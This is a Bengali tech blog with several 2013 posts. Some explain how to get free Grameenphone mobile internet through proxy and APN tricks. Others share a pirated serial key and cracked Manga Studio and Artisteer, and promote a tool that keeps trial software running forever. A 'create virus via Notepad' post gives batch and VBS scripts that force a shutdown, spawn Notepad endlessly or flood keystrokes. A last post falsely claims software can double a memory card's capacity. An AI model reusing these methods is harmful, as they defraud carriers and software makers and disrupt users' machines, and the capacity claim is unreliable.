Thursday 22 August 2013

পিসিতে গ্রামীণফোনের ফ্রি নেট (ফাইনাল টিউন) + অটো ডিসকানেক্ট সমস্যার সমাধান!!!

রথমে আপনাকে পি১ প্যাকেজ ব্যাতিত অন্য যেকোনো প্যাকেজ একটিভ করে নিতে হবে।
এরপর আপনার মোডেম / পিসি সুইট সেটআপ করে নিতে হবে।
পিসি সুইট সেটআপ:
১। নোকিয়া পিসি সুইট ওপেন করুন।

২। এরপর নেট কানেক্ট অপশনে যান। সেখানে নিচের সেটিং অপশনে (স্ক্রু ড্রাইভার আইকন) ক্লিক করুন।

৩। এখানে:

Select Network Operator অপশন থেকে Configure the Connection Manually অপশনে ক্লিক দিয়ে নেক্সট বক্সে ক্লিক করুন।
৪। এখানে শুধু একসেস পয়েন্টে gpmms লিখে টিক চিহ্ন দিয়ে বেরিয়ে আসুন।

৫। এরপর কানেক্ট দিন। প্রথমবার কানেক্ট হতে হালকা সময় নেবে।
এরপর সরাসরি মোজিলা ফায়ারফক্স স্টেপস টিতে চলে যান - - - - -
জিপি মোডেম সেটিং:
১। প্রথমে দেখুন কারেন্ট আছে নাকি!!! আশুগঞ্জ বির্দ্যুৎ কারখানার কয়েকটি মেশিন বন্ধ হয়ে যাওয়ায় এই হবিগঞ্জ এরিয়ায় দিনে ৬ ঘন্টা কারেন্ট পাওয়া যায়!
২। এরপর আপনার পিসি/ল্যাপটপ টি ওপেন করুন।
৩। গ্রামীণফোন মডেম অথবা নোকিয়া পিসি সুইট কানেক্ট করুন।
৪। যেহেতু আমার নোকিয়া পিসি সুইট মানে নোকিয়া সেট নাই তাই আমি গ্রামীণফোন মডেম দিয়ে দেখাচ্ছি, পিসি সুইটেও একই নিময় বজায় রাখুন।
৫। গ্রামীণমোড মডেম সফটটি ওপেন হউক। এরপর টুলস>অপশন এ যান।

৬। টুলস ডায়ালগ বক্স আসলে সেখান থেকে প্রোফাইল ম্যানেজারে যান।

৭। এরপর নিচের মতো করুন এবং ছবি অনুসরণ করুন:

Profile Name:
GPMMS
APN Type:
Static
APN:
gpmms
আর কিছু করা লাগবে না। এরপর সেভ বাটনে ক্লিক করে বেরিয়ে আসুন।
৮। এরপর মেইন মেনু থেকে জিপিএমএমএস সিলেক্ট করে কানেন্ট দিন!

প্রথম বার কানেন্ট হতে হালকা সময় নেবে।****


এখন আপনাকে দুটি সফটওয়্যার ডাউনলোড করতে হবে, নিচের লেখায় ক্লিক করে সরাসরি ডাউনলোড দিন:
১। প্রোক্সিমাইজ - সাইজ ৩ মেগাবাইট,
২। অটো ডায়ালার - সাইজ ৪০০ কিলোবাইট।
প্রোক্সিমাইজ:
প্রোক্সি মাইজ সফটওয়্যারটির মাধ্যমে এখন আর আলাদা করে কোনো প্রোক্সি লাগবে না। এতে আপনি আপনার গোপনীয় সাইট (যেমন ফেসবুক, জিমেইল) মানে যেসব সাইটে পাসওর্য়্যাড দিয়ে ডুকতে হয় তা করতে পারবেন। হ্যাক হবে না।
স্টেপস:
১। সফটওয়্যারটি ডাউনলোড করুন,আনজিপ করুন, এটি পোর্টেবল সংস্করণ তাই সরাসরি প্রোক্সিমাইজ আইকনে ক্লিক করে প্রোগ্রামটি রান করুন।
২। সফটটি ওপেন করলে সিরিয়াল চাইবে।
Name:
GameWala
Serial:
2TCKX-TYQHL-NFN33-3YEDY-QW65D
এই তথ্য দিন।
৩। উপরের দিকে নতুন প্রোফাইল বাটনে ক্লিক করুন।


৪। একটি ডায়ালগ বক্স আসবে। এখানে এডড বাটনে ক্লিক করুন।


৫। এখানে এড্রেস বারে লিখুন ১০.১২৮.০০১.০০২ এবং Port বক্সে লিখুন ৮০৮০, প্রোটোকল HTTP নির্বাচন করে বেরিয়ে আসুন। CLICK OK


এরপর প্রোগ্রামটি মিনিমাইজ করে অটো ডায়ালার সফট টি ওপেন করুন।

এরপর অটো ডায়ালার সেটিং করতে হবে।


অটো ডায়ালার:
এই সফটওয়্যারটির মাধ্যমে নেট বিচ্ছিন্ন হবার সাথে সাথে আবার অটো কানেক্ট হয়ে যাবে। এজন্য আপনাকে প্রথমে প্রোক্সিমাইজ সফটটি চালু রেখে অটো ডায়ালার চালু রাখতে হবে, (মিনিমাইজ করে রাখবেন নেট ব্যবহারের সময় এই দুটি সফট)
ব্যাস! এবার আপনার পিসিতে যেকোনো ব্রাউজার দিয়ে নেট ব্রাউজিং করতে থাকুন।
ডাউনলোড এর জন্য আইডিএম ব্যবহার করুন।



ইন্টারনেট ডাউনলোড ম্যানেজার ব্যবহারের নিয়ম:
আইডিএম ওপেন করে অপশন বারে ক্লিক করুন, সেখান থেকে প্রোক্সি সেটিং এ যান। এখানে Https বক্সে ১০.১২৮.০০১.০০২ এবং পোট ৮০৮০ লিখুন। ব্যবহারে সমস্যা হলে Http বক্সেও লিখতে পারেন।



এবার সরাসরি ডাউনলোড করুন!!!


টরেন্ট ব্যবহারের নিয়ম:
১। যেকোনো টরেন্ট সফট যেমন ইউ টরেন্ট  ওপেন করুন, সেখান থেকে অপশন>পেফারেন্স এ যান।



২। প্রেফারেন্স ডায়ালগ বক্স থেকে কানেকশনস অপশনে ক্লিক করুন।

৩। এখানে প্রোক্সি টাইপ বক্সে HTTPS নির্বাচন করুন। এরপর প্রোক্সি ঘরে লিখুন 10.128.001.002 এবং পোট ৮০৮০।


নিচের use proxy server to peer-to-peer connection বক্সে টিক চিহ্ন দিতে পারেন যদি কাজ না করে বৈকি!
৪। এবার টরেন্ট ডাউনলোড শুরু করুন।

এন্টিভাইরাস আপডেট:
এই পদ্ধতিতে ওই সকল এন্টিভাইরাস আপডেট করা যাবে তাদের আলাদা প্রোক্সি সেটিং থাকে। যেমনটি এই এ্যাভাস্ট এন্টিভাইরাস।
১। এ্যাভাস্ট এন্টিভাইরাস সফট ওপেন করুন, সেটিংস অপশনে ক্লিক করুন:


২। সেটিংস ডায়ালগ বক্স আসবে, এখানে আপডেট অপশনে ক্লিক করুন এবং নিচের দিকে যান।


৩। নিচের দিকে প্রোক্সি সেটিং অপশনে ক্লিক করলে একটি পপ-আপ ডায়ালগ বক্স আসবে। এরপর নিচের ছবির মতো সেটিং করে বেরিয়ে আসুন।


এবার প্রয়োজন মতো আপডেট দিন। :D :p



Sunday 4 August 2013

এন্ড্রোয়েডে ফ্রী নেট চালান Opera দিয়ে (1000000% Working, NO HANDLER) !!!

যা যা লাগবেঃ
• এন্ড্রয়েড মোবাইল
• একটা GP Sim
• Opera Mini
আগের কোন Opera Mini Install করা থাকলে তা Uninstalll করুন। তারপর নিচ থেকে Opera Mini ডাউনলোড করে নি্ন।
http://www.mediafire.com/?f2ipmxy2oi8mv8w
Medifire Password: sany5491
ডাউনলোড হয়ে গেলে Opera Mini টি Install করুন। থামেন, থামেন!!! এখন Opera টি open করবেন না।
Open করার আগে একটি Manual Configuration Setting করে নিন ।
Settings>Wireless and networks>Mobile networks(SIM 1/2 যেটি আপনি ইউস করবেন)> Access Point Names এ যান। তারপর অপশন এ ক্লিক করে New APN এ ক্লিক করুন। আবার নিচের Step গুলো Follow করুনঃ
Name: যেকোন নাম
APN: gpinternet
Proxy: 141.0.11.253
Port: 80
Username: (keep blank)
Password: (keep blank)
Server: internet.grameenphone.com
MMSC: (keep blank)
MMS proxy: (keep blank)
MCC: 470
MNC: 01
Authentication type: None
APN type: interner+mms
এবার Configutarion টি Active করুন।
তারপর GPS on করে Opera Open করুন।
আর ঝাপিয়ে পরুন unlimited browsing & downloading এ।
[বিঃদ্রঃ প্রথমে Opera Open করার সময় আপনার সিমে দুই-তিন টাকা রাখবেন এবং P1 প্যাকেজটি Active রাখবেন। অন্য কোন প্যাকেজ Active থাকলে সমস্যা না। Browsing & Downloading এর সময় মোবাইলে টাকা না রাখাই ভাল <a href="http://facebook.com/atik.raz">ফেসবুকে আমি</a>

Airtel -এ মাত্র ৩০ টাকায় ১GB ইন্টারনেট (আপনি ও পাবেন)

আপনি চাইলে আপনার airtel সংযোগ থেকে ৩০ টাকায় 1 gb ইন্টারনেট পেতে পারেন। খুব সহজ একটি বিষয়।
  • ম্যাসেজ অপশনে লিখুন P10 আর পাঠিয়ে দিন 5000 নাম্বারে। এর মেয়াদ পাবেন ৩০ দিন।
  • তবে সবার আগে একটি কথা হলো- এটি শুক্র আর শনিবার ছাড়া ব্যবহার করা যাবেনা।
৩০ টাকায় যদি মাসে ৮/১০ দিন ইন্টারনেট চালানো যায় তাও কম কিসের

Wednesday 31 July 2013

এবার কোনো দক্ষতা ছাড়াই নিজেই তৈরি করুন কমিকস!!!

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি ভালোই আছেন আমিও অনেক ভালোই আছি :D শিরোনাম শুনে অনেকেই হয়ত অবাক হয়ে গিয়েছেন তাই না ???? অনেকেই মনে করতে পারেন যে আমি নিজে কমিক তৈরি করব তাও আবার কোনো দক্ষতা ছাড়াই ???????? আমার উত্তর "হ্যাঁ" এটা সম্ভব । অবশ্যই সম্ভব , আজকে দুনিয়ায় তো চাঁদেও নিজের ছবি দেয়া যায় :P এসব বিষয় বাদ দেই , খালি খালি এ নিয়ে বকবক করার কোনো মানেই হয়না । আমরা আজকে যেই সফটওয়্যার দিয়ে কমিক তৈরি করব তার নাম "Manga Studio" :)
Manga Studio EX
Manga Studio EX 3 তে আপনি যে সুবিধা আপনি পাবেন -
  • speed lines,
  • lettering,
  • perspective
  • full color support
76417f.jpg
প্রথমেই দেখে নিন সিস্টেম রিকোয়ারমেন্টস গুলো
উইন্ডোজ সিস্টেম রিকোয়ারমেন্টসঃ 
  • Windows XP Home Edition (Service Pack 2), Windows XP Professional (Service Pack 2), Windows XP Tablet PC Edition, Windows Vista Ultimate, Windows Vista Business, Windows Vista Home Premium, Windows Vista Home Basic, Windows 7 Starter, Windows 7 Home Basic, Windows 7 Home Premium, Windows 7 Professional, Windows 7 Ultimate
  • Processor:
    • XP: Intel Pentium Processor or AMD Processor 500MHz or higher (1.0GHz and more is preferred.)
    • Vista: Intel Pentium Processor or AMD Processor 800MHz or higher (2.0GHz and more is preferred.)
  • RAM:
    • XP: 256 MB RAM minimum (512 MB or more recommended)
    • Vista: 512 MB RAM minimum (1.0 GB or more recommended)
  • 2.6 GB or more hard disk space (3.1 GB or more recommended)
  • XGA (1,024 x 768), SXGA (1,280 x 1,024) 16-bit color display
  • Pen Tablet (recommended): Wacom Bamboo, Graphire, Intuos, Cintiq, PL series etc.
  • Printer (optional): 600 dpi or 1,200 dpi laser printer recommended.
  • Scanner (optional): TWAIN 32 compatible
  • DVD-ROM Drive
ম্যাক সিস্টেম রিকোয়ারমেন্টসঃ

  • Mac OS X 10.5 or higher
  • Intel Processors and PowerPC G5, G4 processor 867MHz or faster
  • 1 GB RAM
  • 2.6 GB hard disk space
  • WXGA (1280 x 800), SXGA (1280 x 1024) 24-bit color display
  • Pen Tablet (recommended): Wacom FAVO, Bamboo, Intuos, Cintiq, PL series etc.
  • TWAIN 32 flatbed scanner (optional)
  • DVD-ROM Drive

এর বর্তমান বাজার মুল্য হল ২৯৯.৯৯ ডলার বা ২৩ হাজার ৯৯৯ টাকা ২ পয়সা

এই সফটওয়্যার আপনাদের আমি ফ্রীতে দিচ্ছি আপনাদের কী সৌভাগ্য !!!!!!! :P :P
ডাউনলোড লিঙ্কঃ
অথবা
আপনি সারা গুগল তন্ন তন্ন করে খুঁজলেও এই সফটওয়্যার আপনি কোথায় পাবেন না !!!! :D :D
কেন পাবেন না ?? বুঝতে হবে মামু টিউনটি লিখেছে কে কে :P :B :B :B :B :D

মজার মজার কিছু গুগল ট্রিকস

সবাই আশা করি ভাল আছেন। আজকে কিছু মজার মজার গুগল ট্রিকস নিয়ে আলোচনা করব। অবশ্য এখানে শিক্ষামূলক তেমন কিছুই নাই! গুগলে সার্চ বক্সের পাশে I’m feeling Lucky বা ভাগ্যবান অনুভব করছি লেখাটা নিশ্চয়ই দেখছেন। কিন্তু মনে হয় এটা নিয়া বেশি ঘাটাঘাটি করেন নাই। এই ঘাটাঘাটির কিছু ফল আজকে আমি আপনাদের দেখাবো। চলুন তাহলে দেখে নিই ঘাটাঘাটির কীরূপ ফল পাওয়া যায়।
1. Google Gravity
প্রথমে https://www.google.com/ এ যান, তারপর টাইপ করুন Google Gravity এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। নিচের চিত্রে দেখুনঃ

তারপর দেখুন মজা। গুগল যেন মধ্যাকর্ষণ শক্তি হারিয়ে ভেঙ্গে পড়ছে।
2. Epic Google
প্রথমে https://www.google.com/ এ যান, তারপর টাইপ করুন Epic Google এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। তারপর সবকিছু যেন খালি বড়ই হতে থাকবে, এই বড় হওয়ার মনে হয় আর শেষ হবে না!
3. Google Loco
প্রথমে https://www.google.com/ এ যেয়ে টাইপ করুন Google Loco এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। তারপর দেখুন চাইনিজ জাতীয় কিসব লেখা এসেছে তাই না?
4. Loneliest Number
আগের মত https://www.google.com/ এ যেয়ে টাইপ করুন Loneliest Number এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। তারপর এখান থেকে আপনি গুগলকেই ক্যালকুলেটর হিসেবে ব্যাবহার করতে পারবেন।
5. Annoying Google
আগের মত https://www.google.com/ এ যেয়ে টাইপ করুন Annoying Google এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। এখানে আপনার মনে হবে যেন মান্দাতা আমলের কোন গুগলকে দেখতাসেন!
6. Google Hacker
https://www.google.com/ এ যান এবং টাইপ করুন Google Hacker এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। গুগল যদি হ্যাকারদের তৈরি হত, তাহলে দেখতে কেমন লাগত আপনি তা এখানে দেখতে পাবেন।
7. Rainbow Google
https://www.google.com/ এ যান এবং টাইপ করুন Rainbow Google এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। তারপর রংধনুময় গুগল দেখুন।
8. Google Magic
https://www.google.com/ এ যান এবং টাইপ করুন Google Magic এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। তারপর গুগলের ম্যাজিক দেখুন।
9. Early Google
https://www.google.com/ এ যান এবং টাইপ করুন Early Google এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। তারপর এখানে আপনি গুগলের পুরো ইতিহাস দেখতে পারবেন।
10. Google Mirror
https://www.google.com/ এ যান এবং টাইপ করুন Google Mirror এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। এখানে সবকিছুকে আপনি উল্টা ভাবে দেখতে পাবেন।
11. Google Sphere
https://www.google.com/ এ যান এবং টাইপ করুন Google Sphere এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। সবকিছু যেন প্রাণশক্তি ফিরে পেয়ে নড়াচড়া করছে।
12. Weenie Google
https://www.google.com/ এ যান এবং টাইপ করুন Weenie Google এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক করুন। Epic Google যা দেখছিলেন এটা তার উল্টা। সবকিছুই এখানে ছোট থেকে ছোটতর হতে থাকবে।
13. Google Guitar
সব শেষে দিলাম একটা জোস ট্রিকস! যাদের গিটার বাজানোর শখ আছে কিন্তু গিটার নাই তাদের জন্য এটা সান্ত্বনা হতে পারে! এটার জন্য আগের মত https://www.google.com/ এ যান এবং টাইপ করুন Google Guitar এবং পাশের I’m feeling Lucky অথবা ভাগ্যবান অনুভব করছি লেখাটায় ক্লিক মারুন। তারপর গুগল গিটার আসবে। তারপর আপনার ইচ্ছামত গিটার বাজান সাথে রেকর্ড করারও Option আছে।

HTML, CSS জ্ঞান ছাড়াই তৈরি করে ফেলুন ওয়েব ডিজাইন, ওয়েব টেম্পলেট শুধু একটি সফটওয়্যার ব্যবহার করে

কেমন আছেন সকলে, আশাকরি অনেক অনেক ভাল আছেন। না থাকলে ভাল হয়ে যাবেন আমার এই পোস্ট টা পেয়ে। প্রথমেই বলে রাখি এই সফটওয়্যার টির সম্পর্কে প্রথম জানতে পারি প্রবাসী ভাই এর কাছে।

আমরা অনেকেই ওয়েব ডিজাইন করতে পারি না । ওয়েব ডিজাইন করতে হলে কিছু কোডিং এর সাথে ফটোশপ ও জানতে হয় । কিন্তু তা কয়জনে পারে ? কিন্তু এই Artisteer v4  দিয়ে আপনি Html, Xhtml , CSS ও ফটোশপ না জেনেই খুব সহজে তৈরি করতে পারেন ওয়েব ডিজাইন টেমপ্লেট,জুমলা টেমপ্লেট, ড্রুপাল থিমস , ওয়ার্ডপ্রেস এবং ডটনেটনাড স্কিন কোনো প্রকার দক্ষতা ছারাই।
Artisteer –ই একমাত্র অটোমেশন প্রোডাক্ট যা দিয়ে তাৎক্ষনিক দৃষ্টিনন্দন ও ইউনিক ওয়েবসাইট এবং ব্লগ থিমস তৈরি করা যায় ।

আসুন জেনে নেই এর কিছু ফিচার সম্পর্কে

  • ১। মিনিট এর মধ্যেই তইরী করতে পারবেন আপনার সাইট এর টেম্পলেট।
  • ২। ব্লগার, জুমলা, ওয়ার্ডপ্রেস এবং অন্যান্য সিএমএস এর জন্নে টেম্পলেট ব্যাবহার করা যায়।
  • ৩। কোন ফটোশপ, সিএসএস, এইচটিএমএল বা অন্যান্য প্রযুক্তির শেখার প্রয়োজন নেই।
  • ৪। খুব সহজেই পেজ,কণ্টেণ্ট, লেআঊট গুলো পরিবর্তন করতে পারবেন।
  • ৫। এর মাধ্যমে আপনি পাবেন অসংখ্য অনলাই টেম্পলেট যা সহজেই মডিফাই করতে পারবেন ও আপনার পসন্দ মতো গড়ে তুলতে পারবেন।
  • ৬। ব্যাবহারে অনেক মজা ও কাজ করতেউ অনেক মজা পাবেন।এছাড়া আর অনেক কিছুল।
সফটওয়্যার টির সম্পর্কে আর বিস্তারিত জানতে পারবেন তাদের অফিসিয়াল সাইট এর লিংক এ এখান থেকে
এছাড়া আপনার যদি ব্যাবহারে কোন প্রব্লেম হয় তাহলে আপনি youtube এ সার্চ করে দেখতে পারেন বা কমেন্ট করুন আমি ভিডিও আপলোড করে দিব। এই সফটওয়্যার টির বাজার প্রাইছ  Home & Academic Edition 49.95$ ও  Standard Edition 129.95 $ যার টাকায় হয় ৩৮৯৬ টাকা ও ১০১৩৬ টাকা মিনিমাম, কি টেনশনে পরে গেলেন নাকি, আরে ভাই সমস্যা নাই আমি এখানে আপনাদের কি ফাইল সহ দিয়ে দিচ্ছি, যার মাধ্যমে আপনি একদম ফ্রি পাবেন এই সফটওয়্যার টি।

কিছু ইনফর্মেশন:

এটি ব্যাবহার এর জন্নে আপনার পিসি এর রেম মিনিমাম ২জিবি হওয়া ভাল, তা না হলে অনেক সময় এই স্লও এবং হাং এর সমস্যা হতে পারে। আবার অনেকের সমস্যা নাও হতে পারে।
বিদ্রঃ এই সফটওয়্যার টি অনেক কজের হলেও HTML,CSS কে ছোট বা ও ওকাজের মনে করা ঠিক না, যতই বলেন এইচটিএমএল, ও ছিএসএস কিন্তু বস।
তাহলে দেরি কেন আজকেই ডাউনলোড করে নিন
সফটওয়ারটি BOX এ আপলোড করা আছে ১২০ এমবি
ডাউনলোড করুন এখান থেকে।

এবার GPMMS দিয়ে পিসিতে ফ্রি নেট চালান একটু অন্যরকম ভাবে [পার্ট-২]

আমরা অনেক এই আছি যারা পিসি তে ফ্রী নেট এর জন্য Proxifier ব্যবহার করি।
কিন্তু proxifier ব্যবহার করা একটু ঝামেলা এবং অনেকের জন্য কঠিন। আর সফট টি পিসি এর Ram বেশি ব্যবহার করে।
ফলে লো কনফিগারেশনের পিসিতে নেট চালাতে খুব ঝামেলা হয়ে। পিসির গতি অতিরিক্ত স্লো করে দেয়।
কিন্তু আজ আমি যেই সফট টা দিব তা একেবারে আলাদা এবং ব্যাবহার করা খুব সহজ।

প্রথমে সফট টি এখান থেকে ডাউনলোড করুন

ডাউনলোড

সফট টি ডাউনলোড করে open করুন।
তারপর settings করার পালা।

সফট Open করার পর option এ click করবেন তারপর proxy settings এ গিয়ে manual proxy select করুন।



Proxy Host : 10.128.1.2
Proxy port : 8080
এভাবে settings করার পর OK টে click করার পর সফট টি মিনিমাইজ করুন।
মডেম connect করুন।
অবশ্যই gpmms settings দিয়ে modem connect করবেন।

আবার সফট টি open করুন। দেখবেন automatic connect হচ্ছে ।


এবার আপনার ব্রাউজার এর proxy edit করুন।


এভাবে proxy : 127.00.00.001
port :9666
ব্যাস কাজ শেষ। যে সফট টি ফ্রী use করবেন তার proxy option এ উপরের settings( 127.00.00.001;9666) টা করবেন
যদি IDM use করে থাকেন তাহলে option>Proxy তারপর Get From IE তে click করুন। তারপর Ok করুন।
ব্যাস আপনার idm ও set হয়ে গেল।
NOTE: Proxy gpmms থেকে 127.00.00.001 দেয়ার কারন হচ্ছে proxy টি convert হয়ে গিয়েছে।
আপনি চাইলে নকিয়া পিসিসুইট ব্যবহার করতে পারবেন। এর জন্য আগের নয়ম অনুসারেই কানেক্ট করুন।

ডেমো কিংবা ট্রায়াল সফটওয়্যারকে সারা জীবন ব্যবহার করুন

আজকে একটি ভালমানের সফটওয়্যার নিয়ে এসেছি সবার জন্য।কিছু সফ্টঅয়ার আছে যেগুলো ফ্রিব্যবহার করতে দেয় আবার কিছু সফ্টঅয়ার আছে যা৩০/৯০দিনের জন্য ট্রায়াল হিসেবে দিয়ে থাকে।যখন ৩০/৯০ দিন শেষ হয় তখনসেটি বন্ধ হয়ে হয়ে যায়।সেটি বন্ধ হলেএকটা নির্ধারিত টাকার বিনিময়ে ক্রয়করে ব্যবহার করতে হবে।আপনি ইচ্ছে করলে একটি ছোট্ট সফট (মাত্র ১.১ এমবি) দিয়ে ডেমো কিংবা ট্রায়াল সফটওয়্যার সারাজীবন ব্যবহার করতেপারবেন।
সফটটির নাম টাইমস্টপার।টাইমস্টপার আপনাকে সাহায্য করবে ট্রায়াল সফটএর দিনগননাকে বন্ধ করতেযেটা সফট ইন্সটল এর দিন থেকে শুরু হয়েছিল।

এখন দেখুন সফটটি কিভাবে ব্যবহার করবেনঃ

  • ১ম ধাপঃসফটটি সেটাপ দিন।তারপর ওপেন করুন।
  • ২য় ধাপঃব্রাউজ করে দেখিয়ে দিন *.exe file যেই সফট এর সময় পেছাতে চান।
  • ৩য় ধাপঃনতুন একটা ডেট দিনযেটা হবে ট্রায়াল প্রিয়ড এর মধ্যে যেকোন দিন।
  • ৪র্ থঃনতুন জীবন পাওয়া সফট এর আইকন এর নাম দেবার জন্য নাম লিখুন।
  • ৫মঃ এখন থেকে নতুন তৈরী হওয়া আইকন দিয়ে ব্যবহার করতে থাকুন।
ডাউনলোড লিঙ্কঃ (Downloader)   http://timestopper.blinkweb.com/ 
Direct Download Link (without downloader): Click Here
Direct Download Link টা আমার এক বড় ভাই আপলোড করেছেন। আগে টেকটিউনস্ এ কেউ এ বিষয়ে যদি টিউন করে থাকে তাহলে তার কাছে ক্ষমা চাইছি।প্রথমে একবার এ পোষ্টটি টিটি delete করে দিয়েছিল। এর কারণটি যদি টিটি আমাকে বলে তাহলে পরবর্তী পোষ্টগুলিতে শতর্কতা অবলম্বন করতাম।

Saturday 2 March 2013

এবার আপনিও পারবেন একসাথে দুটি SKYPE ID তে লগিন করতে

আমারা সবাই কম বেশি SKYPE ইউস করি । কিন্তু আমারা ১টা কম্পিউটার এ ১ টির বেশি ID ওপেন করতে পারিনা কিন্তু আজ আমি আপনাদের ১ টা টিপস সিখাব যার ফলে আপ্নারা ১টি কম্পিউটার এ ২ টি SKYPE ID ওপেন করতে পারবেন । এই জন্য প্রথমে SKYPE ডাউনলোড করে ইন্সটল করুন ।
তারপর এখানে জান C:\Program Files\Skype\Phone\
এবার skype.exe ফাইল টাকে right ক্লিক করে send to desktop create shortcut এ ক্লিক করুন এখন দেখবেন ডেক্সটপ এ shortcut তৈরি হয়েছে  এবার সেই shortcut এ right ক্লিক করে properties এ যান এবার target এর ঘরে  লেখুন     “C:\Program Files\Skype\Phone \Skype.exe” /secondary
এবার ok করে বেরিয়ে আসুন । এখন start মেনু থেকে আপনার  প্রথম skype open করুন  আর  ডেক্সটপ এর  shortcut থেকে দ্বিতীয় skype ওপেন করে login korun কন সমসসা হলে জানাবেন

Sunday 3 February 2013

How to solve not enough memory problem

not enough memory
Not enough memory.
Easy solution for not enough memory problem. Many Nokia mobile phone affected by this problem and music player not open properly, and flashing is the only solution for Nokia 2700c, Nokia 5130, Nokia 5220, Nokia 6500c, Nokia X3, Nokia 2690 and others Nokia java phone. But you can solve not enough memory problem within one minutes and without pc. Just Download backup file and move to your memory card root. Open backup file to mark the setting option to click Done. Wait a few minutes to complete restoring phone data and solve not enough memory problem. Open default music player and play music.
Backup file

Sunday 20 January 2013

CREATE VIROUS VIA NOTPAD

আজ আপনাদের শেখাব
কিভাবে দিয়ে ভাইরাস
তৈরি করা যায়।
1. প্রথমে আপনার নোটপ্যাড টি খুলন তার নিচের কোডটি কপি করে nix.bat
নামে সেভ করুন। তারপর
ফাইলটিতে ডাবল ক্লিক করলেই আপনার
কম্পিউটার বার বার মেসেজ দিতে থাকবে।
2. আপনার নোটপ্যাড টি খুলন তার নিচের কোডটি কপি করে nix.bat নামে সেভ করুন। তারপর
ফাইলটিতে ডাবল ক্লিক
করলে আপনার কম্পিউটারেএকটি
মেসেজ দিয়ে বন্ধ হয়ে যাবে।
wx@echo off
msg * I don’t like you
shutdown -c Error! You are too stupid! -s
3. আপনার নোটপ্যাড টি খুলন তার নিচের কোডটি কপি করে nix.bat নামে সেভ করুন। তারপর
ফাইলটিতে ডাবল ক্লিক
করলে দেখবেন
আপনার
কম্পিউটারে
নোটপ্যাড বার বার ওপেন হচ্ছে।

Type :
@ECHO off
:top
START %SystemRoot %system32
otepad.exe
GOTO top
4. আপনার
নোটপ্যাডটি খুলে নিচের কোড টি কপি করে নিন এবং ngx.vbs নামে সেভ করুন। এবার
ফাইলটাতে ডাবল ক্লিক করলেই আপনার কিবোর্ড হ্যাং হয়ে যাবে।
Type :
Set wshShell = wscript.CreateObject
(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys
You are a fool. loop
(Red Signal)

আপনার ১জিবি মেমরি কে ২জিবি তে রুপান্তর করুন

 কেমন আছেন সবাই?আসা করি আল্লাহর রহমতে ভালই আছেন।আজ  একটি Software জাদু  দেখেন
Software টির নাম  Skimedi fix সাইজ মাত্র 94.34 KB
প্রথমে  Software ডাউনলড করন।তারপর  এটি আপনার PC তে Install করেন ।
এবার আপনার Memory card কার্ডরিডারে প্রবেশ করে আপনার PC র
সাথে সংযুক্ত করেন |Software টি Open করেন ।
এবার আপনার Memory Card কে select করেন  করে Fix বাটন চাপুন 
বাস হয়ে গেল আপনার মেমরিটি ১জিবি- ২জিবি 
 
এখান থেকে ডাউনলড করেন
 
Copyright© ATIKRAZ